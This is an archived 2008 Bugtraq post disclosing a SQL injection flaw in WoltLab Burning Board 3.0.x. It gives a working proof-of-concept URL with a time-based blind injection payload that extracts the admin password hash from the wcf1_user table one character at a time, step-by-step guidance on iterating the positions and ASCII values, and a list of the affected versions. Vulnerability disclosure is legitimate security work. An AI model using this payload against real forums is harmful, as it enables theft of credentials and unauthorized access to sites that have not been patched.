lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 19 Feb 2008 18:02:15 +0100
From: nbbn@....net
To: submit@...w0rm.com, bugtraq@...urityfocus.com
Subject: WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

##############################################################################################
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##############################################################################################


::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, 
(SELECT password  FROM wcf1_user WHERE userID=1 AND 
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

An attacker should have to register at the board to use this. 

You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff 
doesn't work. On some MySQL Versions you need to edit this query 



::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

1,1 is the position in the crypted password. 55 is the char in the 
ascii-table. 

In this example we ask for number 7 in the hash, position 1. If the page load 
fast, you find a true char. If not, ask other chars ;-).If you enter a char 
that is higher then the true's, the page load fast to, so start from 48 first 
and go higher. 



::Vulnerabiltiy
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so 
I don't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX 
WoltLab Burning Board 3.0.1 PLX 
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)...



Please don't use this to crack forums. All what you do with this is at your 
own risk.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ